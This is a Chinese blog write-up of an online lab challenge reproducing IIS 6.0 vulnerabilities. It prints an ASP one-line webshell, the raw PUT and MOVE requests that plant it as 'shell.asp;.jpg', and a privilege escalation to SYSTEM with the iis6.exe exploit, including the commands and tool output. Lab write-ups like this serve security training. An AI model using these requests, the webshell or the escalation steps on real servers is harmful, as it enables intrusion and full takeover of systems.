IIS6.0相关漏洞复现

最新推荐文章于 2024-06-23 18:00:00 发布
最新推荐文章于 2024-06-23 18:00:00 发布
阅读量2k 收藏 4
点赞数 2
分类专栏: Web安全 靶场演练 文章标签: 安全 asp.net
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52643498/article/details/126604997
版权

IIS6.0相关漏洞复现

0x00 环境与教程

靶场环境

IIS写权限漏洞分析溯源_主机安全_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)

参考

  1. IIS 6.0漏洞复现 - soapffz’s blog
  2. 题目2-IIS写权限漏洞分析溯源 - 腾讯云开发者社区-腾讯云 (tencent.com)

0x01 利用漏洞

  • IIS PUT写权限漏洞
  • IIS6 文件名解析漏洞
  • IIS6 目录解析漏洞(顺带复现一下)

0x02 实操

PUT写权限漏洞

利用PUT写权限漏洞去上传ASP Webshell

<% eval request("cmd") %>

步骤一:PUT命令写txt文件

PUT /shell.txt HTTP/1.1
Host: 219.153.49.228:43068
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 25

<% eval request("cmd") %>

image-20220830140535469

image-20220830140615712

步骤二:MOVE命令修改文件名,为IIS文件名解析漏洞做准备

MOVE /shell.txt HTTP/1.1
Host: 219.153.49.228:43068
Destination: /shell.asp;.jpg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 25

<% eval request("cmd") %>

image-20220830140653775

image-20220830140715850

步骤三:利用Webshell管理攻击连接一句话木马

我的蚁剑好像出了点小问题,这里使用哥斯拉连接

image-20220830140750196

连接成功,执行一下命令试试

image-20220830123649908

权限过低了

步骤四:提权

参考:(11条消息) 拿到webshell后虚拟终端拒绝访问_sudo0m的博客-CSDN博客

哥斯拉上传有点小问题,这边用菜刀上传

image-20220830143727702

这里iislpe.exe工具提权失败,还得是iis6.exe

Putter:网上找了好久都没找到免费资源,索性付费购买了一个,现在免费传上去,链接在此

结果最终还是找到了,iis6.exe的下载链接与介绍:SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)

[*] 磁盘列表 [ C: ]

c:\inetpub\wwwroot\> help			# 菜刀的帮助命令

设置终端路径:	SETP c:\windows\system32\cmd.exe 或者 SETP /bin/sh
切换到根目录:	ROOT

c:\inetpub\wwwroot\> dir
[Err] 拒绝访问。

c:\inetpub\wwwroot\> qweqwe			# 注:这里输入不存在的指令也拒绝访问,说明需要指定cmd.exe
[Err] 拒绝访问。

c:\inetpub\wwwroot\> SETP c:\inetpub\wwwroot\cmd.exe		# 切换终端为我们上传的终端
设置终端路径为::c:\inetpub\wwwroot\cmd.exe

 C:\Inetpub\wwwroot 的目录			 # 然后命令执行成功

2022-08-30  14:37       <DIR>          .
2022-08-30  14:37       <DIR>          ..
2022-08-30  14:37              201,728 cmd.exe
2022-08-30  14:37               74,752 iis6.exe
2022-08-30  14:13              458,752 iislpe.exe
2013-07-05  04:05                  843 iisstart.htm
2003-02-21  18:48                2,806 pagerror.gif
2022-08-30  14:05                   25 shell.asp;.jpg
2022-08-30  14:10                  284 shell.txt
               7 个文件        739,190 字节
               2 个目录    837,642,240 可用字节


C:\Inetpub\wwwroot\> whoami			# 当前权限为network
nt authority\network service

C:\Inetpub\wwwroot\> iis6.exe "whoami"						# 利用iis6.exe提权
[IIS6Up]-->IIS Token PipeAdmin golds7n Version 
[IIS6Up]-->This exploit gives you a Local System shell 
[IIS6Up]-->Set registry OK
[process walking]: 1024 cmd.exe
[process walking]: 1320 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 1320 
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM 
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system					# 拿到了system权限

步骤五:构造IIS6 目录解析漏洞环境

image-20220830145310124

image-20220830145333372

步骤六:测试IIS6 目录解析漏洞

image-20220830145441933

注意:本实验环境与这个漏洞无关,但是可以通过人为构造进行测试,如果想熟悉这个漏洞,可以尝试联系这个环境 → 内部文件上传系统漏洞分析溯源_文件上传_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)

步骤七:提交flag

题目flag在这个位置

image-20220830150801099 image-20220830150931850
__Hikki__
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
IIS6.0PUT漏洞复现
weixin_55129870的博客
07-11 1266
1、环境配置靶机:windows server 2003+iis6.0攻击机:windows 102、想要攻击成功,需要几个条件,在2003里开启WebDAV,IIS6.0默认情况不支持asp语言,可以通过设置打开asp, c:\Inetput\wwwroot目录,来宾账户需要读写权限,默认网站右键需要设置读写权限 3、环境配置完毕,win10种进行攻击 使用IISPutScanner工具扫描, 可以看到PUT方法已经被允许了,写入权限刚刚也已经设置过了现在,使用桂林老兵工具写入,先通过options方
IIS解析漏洞复现
xj28555的博客
08-13 823
一、IIS6.0 IIS有两种解析漏洞。 第一种是目录解析漏洞 该解析漏洞形成原因是以*.asp命名的文件夹里面的文件都会被当作asp文件解析! 复现 首先我们先搭建一个IIS6.0的服务器,具体搭建方法见https://blog.csdn.net/xj28555/article/details/107951897,文章中还有一些常见的问题也帮大家写出来了。 然后我们创建一个test.txt的文档里面写入hello_world,然后修改后缀名将test.txt改为test.jpg 然后我们
中间件安全IIS----文件解析漏洞利用
最新发布
Karka_的博客
06-23 885
IIS服务器主要存在两种解析缺陷:文件夹解析漏洞和分号截断漏洞。下面就来分别具体了解一下。
iis6.0解析漏洞
weixin_33743880的博客
08-04 195
在 Windows 2003下 IIS 6.0有两个漏洞。以下是我在网上找的资料:  IIS解析漏洞1:  在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。IIS解析漏洞2:  网站上传图...
IIS6.0容器之解析漏洞复现
Louisnie
10-30 7443
漏洞简介 解析漏洞是指web服务器因对HTTP请求处理不当导致将非可执行的脚本,文件等当作可执行的脚本去执行.该漏洞一般配合web容器(iis,nginx,apache,tomcat等)的文件上传功能去使用,以获取服务器的权限. IIS5.X/6.X解析漏洞 对于IIS服务器5版本和6版本存在两个解析漏洞,分别为目录解析和文件解析 目录解析 简介:在网站下建立文件夹的名称中以.asp或.asa等作...
IIS7解析漏洞复现
worker___的博客
12-21 3036
首先我们在win7上安装IIS7,控制面板》程序》打开或关闭windows功能,勾选如下信息,尽量勾选多一点防止实验失败 点击确定,稍等 在windows7虚拟机安装phpstudy2018版本,可先在物理机下载压缩包,然后上传到虚拟机,然后解压安装,选择安装地址为C盘下,安装完成后如下 安装完成后我们可以利用一个phpstudy一键搭建好我们的网站,点击切换版本,然后选择php-5.2.17+IIS 然后我们访问一下phpinfo()看看是否搭建成功 如上图证明我们的网站
漏洞复现篇——IIS6.0解析漏洞
爱国小白帽
02-17 1771
实验环境: win2003 iis服务器 如图示点击,安装IIS服务 使用物理机ping不通虚拟机 按图示勾选,注意此处虚拟适配器是VMnet8 点开Internet协议版本4 (TCP/IPv4)将IP和DNS全都选择自动获得 回到虚拟机点开虚拟网络编辑器 看看网络连接是不是NET模式,虚拟适配器是不是VMnet8 ` 完成后再次尝试,成功 ...
IIS6.0解析漏洞及修复-01
09-15
IIS6.0解析漏洞及修复-01 IIS6.0解析漏洞及修复是Web安全训练营的重要一课,今天我们来讨论IIS6.0解析文件类型和修复方案。 IIS6.0解析文件类型 IIS6.0的解析文件类型是指IIS6.0服务器如何处理不同的文件类型。...
IIS6.0上传漏洞伪静态规则
11-21
**IIS6.0上传漏洞详解** IIS(Internet Information Services)是微软公司推出的一款用于Windows操作系统的Web服务器,版本6.0是其中的一个经典版本。然而,它存在一些安全漏洞,其中一个著名的问题就是“上传漏洞...
IIS 6.0 完整安装包
03-15
IIS是微软官方未Windows系统提供的服务器解决方案。IIS具有集成性、可扩展性、安全性等特点,帮助用户管理内联网、外联网和互联网Web服务器解决方案。目前IIS6.0经过不断改善,内部结构可以完全满足所有客户的需求。
IIS6.0文件解析漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 934
IIS6.0解析漏洞0x0、环境0x1、IIS6.0解析漏洞分两种1、目录解析2、文件解析 0x0、环境 Windows 2003;IIS6.0 Windows 2003序列号: DF74D-TWR86-D3F4V-M8D8J-WTT7M(2020.3.24测试可用) 0x1、IIS6.0解析漏洞分两种 1、目录解析 以*.asp、*.asa、*.cer命名的文件夹里的文件都将会被当成ASP文件执...
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6274
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
IIS 解析漏洞复现
来日可期的博客
10-12 3222
IIS 7.0/7.5 解析漏洞,在路径的末尾添加一个/.php,页面报错的原因是这里使用的是IIS10.0 该漏洞已被修复。php解释执行是通过php解释器来决定的,这里我们使用phpstudy中的php-cgi.exe。当用户访问phpinfo.php的时候,将该文件找到交给php-cgi.exe来解释执行。修改php.ini文件中的cgi.fix.pathinfo的值为0。将phpinfo.php后缀名修改为png,重新访问页面。在指定目录下创建一个phpinfo.php文件。
复现iis 文件解析漏洞
BBH_FCC的博客
03-19 204
(1)开启IIS服务:开始-管理工具-Internet信息服务(IIS)管理器。(2)点击Internet信息服务(IIS)管理器,查看自己web网站中的文件和IIS服务的开始、停止、暂停按钮,查看IIS服务是否开启,若未开启请开启:HLY(本地计算机)-网站-默认网站。(3)在上个页面中是无法编辑自己的web服务的,需要在本机中找到web目录。这个环境中的默认web目录是在C:\Inetpub\wwwroot下:我的电脑-C:\Inetpub\wwwroot。
微软IIS6漏洞:服务器敏感信息易被窃
weixin_34320724的博客
10-08 192
  近日,安全专家对使用微软Internet信息服务IIS 6的管理员发出警告,声称Web服务器很容易受到攻击并暴露出密码保护的文件和文件夹。   据悉,基于WebDAV协议的部分进程命令中存在这种漏洞。通过给Web地址添加一些Unicode字符,黑客就可以访问这些敏感文件——这些文件一般都有系统密码保护。另外,该漏洞也可以被用来给服务器上传恶意文件。   Nikolaos Rangos安全研究...
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 5921
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exeiiswrite等工具。
IIS6.0解析漏洞
tonghua6的专栏
04-05 692
 IIS解析漏洞式什么?在 Windows 2003 IIS 6.0 下有两个漏洞,微软一直没有给出补丁。   IIS解析漏洞1:   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值